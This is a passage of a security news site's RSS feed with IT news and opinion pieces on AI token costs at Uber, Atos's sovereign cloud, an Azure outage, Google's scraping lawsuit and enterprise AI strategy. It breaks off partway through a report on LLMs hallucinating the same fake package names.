<p class="wp-block-paragraph">Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and <a href="https://www.forbes.com/sites/janakirammsv/2026/05/17/uber-burns-its-2026-ai-budget-in-four-months-on-claude-code/">a clear case study</a> in how limited oversight snowballs into an AI blowout.</p>



<p class="wp-block-paragraph">This is a phenomenon I like to call “shadow tokens” — AI credits paid for by the company but largely invisible to decision-makers. Too many engineers have the final say over how much they consume and, therefore, what it costs. This all-you-can-eat attitude is part of the reason why <a href="https://www.theverge.com/tech/930447/microsoft-claude-code-discontinued-notepad">Microsoft is reportedly</a> winding down many internal licenses across key engineering teams and why <a href="https://www.thestreet.com/investing/the-next-phase-of-ai-spending-is-already-underway">one in five organizations</a> is missing its AI spend forecast by more than 50%.</p>



<p class="wp-block-paragraph">And the trend is only accelerating. By 2028, <a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html">Gartner predicts</a> that AI coding costs (driven by this kind of ungoverned consumption) will be as much per developer as the salary companies pay that person.</p>



<p class="wp-block-paragraph">LLMs and agents introduce a new class of variable cost that scales with behavior rather than headcount, putting enterprises on the hook for tools that balloon with workload. I don’t see this as enterprises overspending because they’re reckless — it’s down to a lack of managerial oversight, budget alignment that demands a proven return on investment, and engineer education on how much is too much.</p>



<p class="wp-block-paragraph">Going forward, CIOs need to thread the AI needle between governance that encourages transparency and reasonable spend without stifling innovation.</p>



<h2 class="wp-block-heading">When shadow tokens result in real costs</h2>



<p class="wp-block-paragraph">The issue is that AI isn’t a traditional line item. Previously, enterprise leaders onboarded software-as-a-service (SaaS) with a good idea of the total cost. An allocated software seat or annual contract was a known quantity. The cloud added some variation (with fluctuations depending on hosting size), but instances were still modelable. AI flips this status quo on its head — the unit of consumption is behavior and the cost is exponential.</p>



<p class="wp-block-paragraph">And these specifics aren’t immediately apparent at pilot. Tools can appear inexpensive in controlled experiments yet unpredictably scale depending on session length, context window size, model selection and whether agents run in parallel. This is the fallacy of the $20-per-seat enterprise plan — tokens are charged separately at API rates with no ceiling. The final dollar value of any session is set by factors that finance can’t always model in advance, particularly when these decisions usually rest with the engineers themselves.</p>



<p class="wp-block-paragraph">According to <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html">Deloitte</a>, only 21% of organizations deploying agents have a mature governance model, a real concern because they’re token-eating machines. This is what was happening at Uber — Claude Code in agentic mode was autonomously reading codebases, planning changes across dozens of files and opening pull requests. Each step quickly adds up, with Anthropic’s own documentation noting that agents consume approximately seven times as many tokens as standard sessions.</p>



<p class="wp-block-paragraph">This is shadow IT and shadow AI, evolved. This time, however, many leaders approved the tool in question without guardrails governing consumption. AI hype adds fuel to the fire and normalizes long sessions. Uber’s CTO, for example, <a href="https://x.com/praveenTweets/status/2033627282418655711">described</a> a company-wide shift toward “agentic software engineering” with employees “who are quietly experimenting, quietly shipping and quietly pushing things forward”. This is an exciting way to test the limits of what’s possible, certainly, but it’s also a position that goes a long way to explaining how the company spent its annual AI budget by April.</p>



<h2 class="wp-block-heading">Shifting the culture from usage to yield</h2>



<p class="wp-block-paragraph">Engineers haven’t done anything wrong here. In fact, they’re adopting and experimenting as instructed, with Uber creating leaderboards and ranking users by token consumption. More use led to a better ranking, reflecting a culture that lauds new ways of doing things. This behavior is known as “<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">tokenmaxxing</a>,” and its principal knock-on effect is shadow tokens — quantity-over-quality processes that leaders struggle to control until they’re fully realized in the budget. Of course, if management treats adoption metrics as performance metrics, then engineers can’t be blamed for using more tokens. The tension is that the teams driving adoption aren’t the ones managing spend.</p>



<p class="wp-block-paragraph">None of this is meant to dismiss AI’s productivity possibilities and potential return on investment. Developers save <a href="https://getdx.com/blog/ai-assisted-engineering-q4-impact-report-2025/">3.6 hours</a> per week, achieve 60% higher pull request throughput and cut onboarding time in half with automation. Meanwhile, Uber shared that roughly 11% of live backend updates were written by agents with no human in the loop. However, these wins aren’t the problem — it’s that too many teams aren’t connecting input to output. I’ve spoken to admins who discovered their token spend had tripled in a single quarter after using heavier models or accidentally doubling up on agentic applications. Nobody knew until the financial damage was done.</p>



<p class="wp-block-paragraph">Automation needs to happen sustainably with an eye on the bottom line. In my view, a much better metric for achieving this is AI yield — the measurable business or engineering output generated per dollar spent on tokens. Otherwise, without a feedback loop, even genuinely productive teams are flying blind.</p>



<h2 class="wp-block-heading">Stopping token waste before an AI blowout</h2>



<p class="wp-block-paragraph">Creating that throughline between AI investment and token consumption starts with established financial metrics. This is possible via maximum spend limits (dictated by spend tagging, workload tiering and cost-per-output benchmarks) per team or project. Then, any additional allocation requires approval, closing the loop between the engineers spending the tokens and the leaders paying for them. AI isn’t cheap and teams should demonstrate a bang for their buck.</p>



<p class="wp-block-paragraph">This is something we do with our engineering team at Hexnode. Resource allocation for Claude Code and Cursor is tied directly to ROI rather than letting consumption run open-ended. Given the pay-as-you-go nature of these tools, a firm usage limit per team offers simple but essential control.</p>



<p class="wp-block-paragraph">Similarly, there’s room to apply some of the governance principles IT uses for device management. Things like policy enforcement, role-based access, real-time monitoring and automated alerts can flag usage behavior in advance. Uncovering such insights at the token layer works to identify power users and prevent excessive spending.</p>



<p class="wp-block-paragraph">We also need to encourage cultures that praise outputs that actually achieve efficiency. AI applications that result in shipping faster, reducing rework and cutting review cycles are gains that should be celebrated. If your company hosts leaderboards, frame unnecessary token burn as wasteful rather than valuable. The organizations creating healthier consumption habits work with their engineers to understand not just how to use AI, but what responsible use looks like and what it costs.</p>



<p class="wp-block-paragraph">This is a conversation teams need to have now. Anthropic <a href="https://support.claude.com/en/articles/15036540-use-the-claude-agent-sdk-with-your-claude-plan">just ended flat-rate pricing</a> for programmatic workloads from June 15. Now, agents, continuous integration pipelines and automated workflows draw from a dedicated monthly credit pool billed separately from the subscription. Once that pool is exhausted, agent tasks either stop entirely or overflow to extra billing. Work can either get very expensive or grind to a halt for teams that aren’t prepared.</p>



<p class="wp-block-paragraph">Getting a grip on shadow tokens means better rules and tools connecting spend to outcomes. Only by building the financial and cultural infrastructure that encourages sustainable adoption can leaders see what they’re spending, connect it to what they’re getting and course-correct before the costs become a crisis. Ultimately, shadow tokens are only invisible if we choose not to look.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Atos launches sovereign cloud service to power comeback]]></title>
<description><![CDATA[Atos has launched a new sovereign cloud platform aimed squarely at European public sector bodies, healthcare providers and defense organizations. It’s the latest effort by European companies in their fight back against US dominance.



Atos Sovereign Cloud offers a range of controls for data mana...]]></description>
<link>https://tsecurity.de/de/3691386/it-security-nachrichten/atos-launches-sovereign-cloud-service-to-power-comeback/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691386/it-security-nachrichten/atos-launches-sovereign-cloud-service-to-power-comeback/</guid>
<pubDate>Fri, 24 Jul 2026 13:26:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Atos has launched a new sovereign cloud platform aimed squarely at European public sector bodies, healthcare providers and defense organizations. It’s the latest effort by European companies in their fight back against US dominance.</p>



<p class="wp-block-paragraph">Atos Sovereign Cloud offers a range of controls for data management, providing customers with resilience and full control over their data, complying with existing European legislation on data residency.</p>



<p class="wp-block-paragraph">“Digital sovereignty has become a global operational priority for organizations that need to manage dependencies, jurisdictional exposure and disruption risks across complex digital environments. Atos Sovereign Cloud gives customers a practical way to apply sovereign controls to their most critical workloads, while preserving flexibility, resilience and the ability to innovate securely,” said Michael Kollar, Atos Group digital sovereignty leader.</p>



<p class="wp-block-paragraph">There has been a concerted effort by <a href="https://www.computerworld.com/article/4121422/europe-votes-to-tackle-deep-dependence-on-us-tech-in-sovereignty-drive.html">European organizations to meet US competition</a> head-on. Earlier this month, <a href="https://www.networkworld.com/article/4192767/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program.html">four companies signed up to the certification program</a> introduced by the European cloud body, CISPE,</p>



<p class="wp-block-paragraph">This is the latest effort by Atos to get the company back on track. In April, <a href="https://www.networkworld.com/article/4154186/french-government-take-bull-by-horns-for-e404-million.html">it sold its supercomputer company, Bull</a> to the French government, after a previous attempt in 2024 to <a href="https://www.cio.com/article/1310376/atos-deal-to-sell-its-legacy-service-business-falls-through.html">sell off its computer services division</a> and <a href="https://www.cio.com/article/2086965/atos-staves-off-bankruptcy-casts-wider-net-for-refinancing.html">after a refinancing deal</a> in the same year.</p>



<p class="wp-block-paragraph">The company implemented a further round of refinancing this year and <a href="https://www.atosgroup.com/en/press/first-phase-refinancing-strategy-completed" target="_blank" rel="noreferrer noopener">in its half-yearly report</a> claimed that this was an “important milestone” in securing the company’s future. However, in its first-quarter results revenue showed an organic decline of 11 percent, so any projected growth may be some time in the future. Whether its Sovereign Cloud offering is the harbinger of the revival remains to be seen.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.cio.com/article/4201118/atos-launches-sovereign-cloud-service-to-power-comeback.html">CIO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft explains why its West US Azure and cloud services failed]]></title>
<description><![CDATA[Microsoft cloud and Azure services hosted on the West Coast of the US went down for hours on Thursday when network connectivity failed. Although services running entirely within Microsoft’s West US cloud region were unaffected, any traffic entering or leaving the facilities was affected.



Micro...]]></description>
<link>https://tsecurity.de/de/3691376/it-nachrichten/microsoft-explains-why-its-west-us-azure-and-cloud-services-failed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691376/it-nachrichten/microsoft-explains-why-its-west-us-azure-and-cloud-services-failed/</guid>
<pubDate>Fri, 24 Jul 2026 13:20:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft cloud and Azure services hosted on the West Coast of the US went down for hours on Thursday when network connectivity failed. Although services running entirely within Microsoft’s West US cloud region were unaffected, any traffic entering or leaving the facilities was affected.</p>



<p class="wp-block-paragraph">Microsoft has now published a Preliminary Post Incident Review (PIR) of the incident, reporting that connectivity was lost for five hours between 14.44 UTC (7.44 a.m. Pacific Time) and 19.41 UTC on July 23. The problem was caused when a set of IP routes was removed in error while isolating a device for routine maintenance.<strong></strong></p>



<p class="wp-block-paragraph">Before starting the maintenance work, Microsoft checked that at least one of the two redundant paths to the facility remained operational. When it came to starting the work, however, automated systems included some additional devices in the perimeter to be isolated, and removing some IP routes that had not been included in the initial assessment.</p>



<p class="wp-block-paragraph">Customers discovered the problems very quickly, and engineers identified the issue within the first hour and started to reconnect services.  Microsoft said the disruption had been caused by some “recent fiber maintenance activity”.</p>



<p class="wp-block-paragraph">To minimize the risk of disruption from such errors in the future, Microsoft advised organizations handling mission-critical data to consider a multi-region approach.</p>



<p class="wp-block-paragraph">The Azure outage was the second significant one to hit Microsoft this year. In February, <a href="https://www.networkworld.com/article/4127142/azure-outage-disrupts-vms-and-identity-services-for-over-10-hours.ht">there was a 10-hour disruption to US West and US East regions</a>.</p>



<p class="wp-block-paragraph"><em>This article first appeared on Network World.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google’s anti-search-scraping lawsuit dismissed]]></title>
<description><![CDATA[A court has dismissed Google’s case against SerpApi over that company’s scraping of search results to train AI models.



The US District Court for the Northern District of California found that there was no indication that any copyright had been breached.



Google announced in December that it ...]]></description>
<link>https://tsecurity.de/de/3691374/it-nachrichten/googles-anti-search-scraping-lawsuit-dismissed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691374/it-nachrichten/googles-anti-search-scraping-lawsuit-dismissed/</guid>
<pubDate>Fri, 24 Jul 2026 13:20:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A court has dismissed <a href="https://storage.courtlistener.com/recap/gov.uscourts.cand.461513/gov.uscourts.cand.461513.42.0.pdf" target="_blank" rel="noreferrer noopener">Google’s case against SerpApi</a> over that company’s scraping of search results to train AI models.</p>



<p class="wp-block-paragraph">The US District Court for the Northern District of California found that there was no indication that any copyright had been breached.</p>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4111155/google-says-no-to-training-ai-on-its-search-results.html">Google announced in December</a> that it was suing SerpApI for its alleged web scraping, claiming that it was protecting copyright holders. In February<a href="https://www.computerworld.com/article/4136288/serpapi-fights-back-against-google-lawsuit.html">, SerpApI fought back and asked the court</a> to dismiss Google’s case. And this week, Judge Yvonne Gonzalez Rogers agreed with SerpApi that Google’s case has no merit.</p>



<p class="wp-block-paragraph">Google’s argument was that SerpApi’s actions breached the US Digital Millennium Copyright Act (DCMA). It made two claims: first, that no person shall circumvent a technological measure that effectively controls access to a work protected under this title, and second that no person shall manufacture, import, offer to the public, provide, or otherwise traffic in any technology, product, service, device, or component protected by the Act.</p>



<p class="wp-block-paragraph">SerpApi claimed that the URLs and other links that were being served by Google did not in themselves entail copyright and the judge agreed. In her judgment, she said that there was no indication that the copyright holders had authorized Google to take action against SerpApi.</p>



<p class="wp-block-paragraph">The case is not completely over as the judge has given Google 21 days to amend its complaint to demonstrate that it was acting on behalf of the copyright owners. It remains to be seen whether its war against the web scrapers is finally over.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft explains why its West US Azure and cloud services failed]]></title>
<description><![CDATA[Microsoft cloud and Azure services hosted on the West Coast of the US went down for hours on Thursday when network connectivity failed. Although services running entirely within Microsoft’s West US cloud region were unaffected, any traffic entering or leaving the facilities was affected.



Micro...]]></description>
<link>https://tsecurity.de/de/3691358/it-security-nachrichten/microsoft-explains-why-its-west-us-azure-and-cloud-services-failed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691358/it-security-nachrichten/microsoft-explains-why-its-west-us-azure-and-cloud-services-failed/</guid>
<pubDate>Fri, 24 Jul 2026 13:12:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft cloud and Azure services hosted on the West Coast of the US went down for hours on Thursday when network connectivity failed. Although services running entirely within Microsoft’s West US cloud region were unaffected, any traffic entering or leaving the facilities was affected.</p>



<p class="wp-block-paragraph">Microsoft has now published a Preliminary Post Incident Review (PIR) of the incident, reporting that connectivity was lost for five hours between 14.44 UTC (7.44 a.m. Pacific Time) and 19.41 UTC on July 23. The problem was caused when a set of IP routes was removed in error while isolating a device for routine maintenance.<strong></strong></p>



<p class="wp-block-paragraph">Before starting the maintenance work, Microsoft checked that at least one of the two redundant paths to the facility remained operational. When it came to starting the work, however, automated systems included some additional devices in the perimeter to be isolated, and removing some IP routes that had not been included in the initial assessment.</p>



<p class="wp-block-paragraph">Customers discovered the problems very quickly, and engineers identified the issue within the first hour and started to reconnect services.  Microsoft said the disruption had been caused by some “recent fiber maintenance activity”.</p>



<p class="wp-block-paragraph">To minimize the risk of disruption from such errors in the future, Microsoft advised organizations handling mission-critical data to consider a multi-region approach.</p>



<p class="wp-block-paragraph">The Azure outage was the second significant one to hit Microsoft this year. In February, <a href="https://www.networkworld.com/article/4127142/azure-outage-disrupts-vms-and-identity-services-for-over-10-hours.ht">there was a 10-hour disruption to US West and US East regions</a>.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Atos launches sovereign cloud service to power comeback]]></title>
<description><![CDATA[Atos has launched a new sovereign cloud platform aimed squarely at European public sector bodies, healthcare providers and defense organizations. It’s the latest effort by European companies in their fight back against US dominance.



Atos Sovereign Cloud offers a range of controls for data mana...]]></description>
<link>https://tsecurity.de/de/3691349/it-security-nachrichten/atos-launches-sovereign-cloud-service-to-power-comeback/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691349/it-security-nachrichten/atos-launches-sovereign-cloud-service-to-power-comeback/</guid>
<pubDate>Fri, 24 Jul 2026 13:12:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Atos has launched a new sovereign cloud platform aimed squarely at European public sector bodies, healthcare providers and defense organizations. It’s the latest effort by European companies in their fight back against US dominance.</p>



<p class="wp-block-paragraph">Atos Sovereign Cloud offers a range of controls for data management, providing customers with resilience and full control over their data, complying with existing European legislation on data residency.</p>



<p class="wp-block-paragraph">“Digital sovereignty has become a global operational priority for organizations that need to manage dependencies, jurisdictional exposure and disruption risks across complex digital environments. Atos Sovereign Cloud gives customers a practical way to apply sovereign controls to their most critical workloads, while preserving flexibility, resilience and the ability to innovate securely,” said Michael Kollar, Atos Group digital sovereignty leader.</p>



<p class="wp-block-paragraph">There has been a concerted effort by <a href="https://www.computerworld.com/article/4121422/europe-votes-to-tackle-deep-dependence-on-us-tech-in-sovereignty-drive.html">European organizations to meet US competition</a> head-on. Earlier this month, <a href="https://www.networkworld.com/article/4192767/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program.html">four companies signed up to the certification program</a> introduced by the European cloud body, CISPE,</p>



<p class="wp-block-paragraph">This is the latest effort by Atos to get the company back on track. In April, <a href="https://www.networkworld.com/article/4154186/french-government-take-bull-by-horns-for-e404-million.html">it sold its supercomputer company, Bull</a> to the French government, after a previous attempt in 2024 to <a href="https://www.cio.com/article/1310376/atos-deal-to-sell-its-legacy-service-business-falls-through.html">sell off its computer services division</a> and <a href="https://www.cio.com/article/2086965/atos-staves-off-bankruptcy-casts-wider-net-for-refinancing.html">after a refinancing deal</a> in the same year.</p>



<p class="wp-block-paragraph">The company implemented a further round of refinancing this year and <a href="https://www.atosgroup.com/en/press/first-phase-refinancing-strategy-completed" target="_blank" rel="noreferrer noopener">in its half-yearly report</a> claimed that this was an “important milestone” in securing the company’s future. However, in its first-quarter results revenue showed an organic decline of 11 percent, so any projected growth may be some time in the future. Whether its Sovereign Cloud offering is the harbinger of the revival remains to be seen.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I changed how I pitch AI: It’s no longer about saving money, but managing tokens and adoption]]></title>
<description><![CDATA[I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.



The initial hype has ...]]></description>
<link>https://tsecurity.de/de/3691324/it-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691324/it-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</guid>
<pubDate>Fri, 24 Jul 2026 13:04:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.</p>



<p class="wp-block-paragraph">The initial hype has faded, leaving CIOs to drive real enterprise value. Based on my experience implementing Google, OpenAI and Anthropic technologies, here are the fundamental, technology-agnostic lessons every leader must anchor their strategy around.</p>



<h2 class="wp-block-heading"><a></a>AI as a leadership multiplier</h2>



<p class="wp-block-paragraph">The most common tactical error we see is treating AI as an isolated technology project. What I have observed among our customers is that true success does not come from organizations that define a standalone “AI strategy,” but rather from those leaders that integrate AI into their business strategy.</p>



<p class="wp-block-paragraph">When our customers isolate AI and define an AI strategy, it inevitably treats it like a “technological toy” to experiment with. This approach yields fragmented, orphaned initiatives that fail to scale because they are fundamentally disconnected from their core corporate objectives. What I learned is that AI is not the ultimate destination; it is a powerful catalyst. We have replaced “What can AI do for our customers?” with a more strategic question, “How does AI accelerate their existing business goals?”</p>



<p class="wp-block-paragraph">Think of AI like electricity. No modern corporation designs a standalone “electricity strategy.” Instead, all companies route it invisibly across the entire organization to illuminate offices, power production lines and drive communication. AI must be woven into the enterprise fabric in the exact same way, acting as an underlying utility that supercharges your existing operational model.</p>



<p class="wp-block-paragraph">Integrating AI into the broader business strategy also dictates how we measure success. It forces a shift away from short-term tech vanity metrics and anchors the technology into a long-term roadmap.</p>



<p class="wp-block-paragraph">When AI remains trapped within the IT department of our customers, we notice that it is relegated to a mere “software experiment.” To become a true competitive advantage, we observed that AI requires intense cross-functional orchestration. This perspective does not diminish the merit of the technical team; their expertise is fundamental for establishing the architecture, data governance and tools your enterprise requires. However, while IT builds the foundational infrastructure, it lacks the organizational authority to decide what should be built on top of it. Only the CEO or the owner of the company can step in to ensure AI leaves the “toy project” phase and integrates into the DNA of the organization.</p>



<p class="wp-block-paragraph">The requirement for top-down, executive ownership stems from three critical realities observed in the field:</p>



<ul class="wp-block-list">
<li><strong>Silo-smashing and data collaboration:</strong> True enterprise AI is data-hungry and that data lives across disparate business lines, finance, operations, marketing and customer service. Only the CEO possesses the cross-functional authority to demand that data silos be dismantled.</li>



<li><strong>Cultural transformation and fear mitigation:</strong> AI triggers widespread anxiety over job displacement across all industries and hierarchies. When relegated to an “IT project,” resistance spikes as teams view it as a threat to their livelihoods. When I saw the CEO lead this cultural shift directly is when I noticed the best results.</li>



<li><strong>C-Suite education and strategic alignment:</strong> The mandate for AI capability cannot just be delegated downward; the transformation must begin at the very top. I have conducted more than 70 presentations for the Board of Directors and C-Level teams. These people need to be actively educated not on technical code, but on specific business use cases, return on investment (ROI) frameworks and how AI resolves core organizational bottlenecks.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html">PwC’s data found that only 12% of enterprises have achieved both cost and revenue benefits from AI</a>. Those elite 12% succeeded precisely because their CEOs embedded AI extensively across <em>strategic decision-making and cross-functional workflows</em>. AI is simply too disruptive and too critical to be left exclusively in the hands of technical experts. If AI is not on the CEO’s weekly agenda, it is fundamentally missing from the company’s true strategy.</p>



<h2 class="wp-block-heading"><a></a>AI as a new operational framework</h2>



<p class="wp-block-paragraph">Traditional IT systems have operated on strict algorithmic certainty: if you input a specific set of data, the system executes an immutable line of code and guarantees the same, predictable output every single time.</p>



<p class="wp-block-paragraph">AI completely breaks this paradigm. Because modern AI is built on probabilistic models, it does not execute static formulas; instead, it predicts the most likely correct response based on mathematical probabilities. This means that AI solutions carry an inherent, small percentage of uncertainty and variability. A prompt entered today might yield a slightly different, though contextually valid, output tomorrow.</p>



<p class="wp-block-paragraph">Executive leadership and organizational cultures must be actively educated to accept and navigate this fundamental shift. Traditional quality assurance frameworks for software are designed for a 100% success rate. Applying this rigid standard to AI will paralyze your initiatives, keeping 80% of your projects trapped eternally in the pilot phase. This happened to us in a food and beverage company in Latin America a couple of years ago. After this experience, we started to include conditions in our contracts that tolerate statistical margins of error and still define the project as a success.</p>



<p class="wp-block-paragraph">In terms of cost calculation, we had to teach CIOs and business managers to forget the monthly subscription model for AI and learn to manage the primary unit of exchange in modern AI: the token.</p>



<p class="wp-block-paragraph">To understand AI costs, executives must understand how large language models process data. AI models do not read full words; instead, they break text, images or code down into “pieces” called tokens. As a baseline, every 100 words process as approximately 130 to 140 tokens. Because the major AI providers use the token as their currency, <a href="https://arxiv.org/pdf/2604.22750">your business is billed dynamically based on the exact volume of tokens consumed</a> by every query submitted (input) and every response generated (output).</p>



<p class="wp-block-paragraph">Many leaders believe AI costs are fixed due to flat-rate enterprise tiers ($25–$30/user). This is a temporary illusion. These venture-capital-subsidized rates mask true operational costs and come with dynamic usage limits. Modeling long-term ROI on them guarantees a severe budget shock when true consumption pricing takes over.</p>



<p class="wp-block-paragraph">The solution is not to halt AI adoption; doing so means losing your competitive edge. Instead, the cost per token must cease to be treated as a technical footnote relegated to the IT department. It must be elevated to a core business variable.</p>



<h2 class="wp-block-heading">Risks in the AI adoption model</h2>



<p class="wp-block-paragraph">Since the beginning of the AI boom, I have seen all our customers making a critical tactical error that could cost them heavily in the medium term: they are focusing only on operational efficiency (reducing costs with AI).</p>



<p class="wp-block-paragraph">I have observed that an alarmingly high percentage of companies remain trapped in pilot phases focused exclusively on short-term cost reduction. <a href="https://www.bain.com/insights/your-ai-budget-is-growing-your-returns-arent-heres-why/">Bain &amp; Company’s global Automation and AI Pathfinder Survey </a>found that the largest share of companies measuring their AI initiatives (exactly 40%) realized cost reductions of 10% or less, heavily missing their internal targets. Our customers are putting too many resources and effort into marginal financial gains and in doing so, they are jeopardizing their most valuable assets: service quality, resilience and customer trust.</p>



<p class="wp-block-paragraph">Utilizing AI solely to slash headcount or cut operational corners is a dangerous trap that introduces severe field liabilities. A financial service organization in Latin America announced that they saved $1 million in customer support by replacing humans with AI chatbots. However, the mid-term reality revealed a different story: a damaged brand reputation due to AI errors and an influx of frustrated clients fleeing because the automated system cannot handle special cases.</p>



<p class="wp-block-paragraph">Putting a company on an extreme AI diet might make it look leaner on next quarter’s financial statement, but over-indexing on cost-cutting will ultimately leave the business too weak to compete when market dynamics shift. We are now inviting our customers to change the question from <em>“How much money will AI save us?”</em> to <em>“How will we leverage AI to exponentially increase the long-term value of our enterprise?”</em></p>



<p class="wp-block-paragraph">Deploying enterprise AI is a marathon, not a sprint, and the terrain changes with every mile. The organizations that thrive in this next era will be those that transition from fascination to discipline, treating AI not as a magic bullet for immediate savings, but as a core capability that demands rigorous governance, architectural foresight and cultural maturity. Navigating this shift requires moving past the theoretical hype and anchoring decisions in raw, field-tested reality.</p>



<p class="wp-block-paragraph">As we continue to deploy these technologies across industries, the blueprint for success is being rewritten in real time. Let’s keep this conversation going as we map out the future of business intelligence together.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Top AIs invent same fake PyPl and npm package names]]></title>
<description><![CDATA[Enterprise software developers continue to be in danger of falling victim to slopsquatting, where AI coding tools hallucinate the existence of nonexistent libraries and hackers create malicious packages in response.



The top AI coding tools are remarkably consistent in their hallucinations: Res...]]></description>
<link>https://tsecurity.de/de/3691314/it-security-nachrichten/top-ais-invent-same-fake-pypl-and-npm-package-names/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691314/it-security-nachrichten/top-ais-invent-same-fake-pypl-and-npm-package-names/</guid>
<pubDate>Fri, 24 Jul 2026 12:56:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Enterprise software developers continue to be in danger of falling victim to slopsquatting, where AI coding tools hallucinate the existence of nonexistent libraries and hackers create malicious packages in response.</p>



<p class="wp-block-paragraph">The top AI coding tools are remarkably consistent in their hallucinations: Researcher Aleksandr Churilov found the same 127 fake package names generated by five different LLMs.</p>



<p class="wp-block-paragraph"><a href="https://www.csoonline.com/article/3961304/ai-hallucinations-lead-to-new-cyber-threat-slopsquatting.html">Slopsquatting is a relatively new form of malware attack</a> that involves the creation of malicious packages in response to the hallucinations of AI coding tools, causing the malicious packages to be incorporated into legitimate applications.</p>



<p class="wp-block-paragraph">Churilov set out his findings in a research paper, <a href="https://arxiv.org/abs/2605.17062" target="_blank" rel="noreferrer noopener">The Range Shrinks, the Threat Remains: Re-evaluating LLM Package Hallucinations on the 2026 Frontier-Model Cohort</a>, which is yet to be peer-reviewed. He found 127 hallucinated package names were shared across Claude Sonnet 4.6, Claude Haiku 4.5, GPT-5.4-mini, Gemini 2.5 Pro, and DeepSeek V3.2.</p>



<p class="wp-block-paragraph"> As of April this year, 53 of those names — 41 on the PyPI software repository and 12 on npm —are still available for registration.</p>



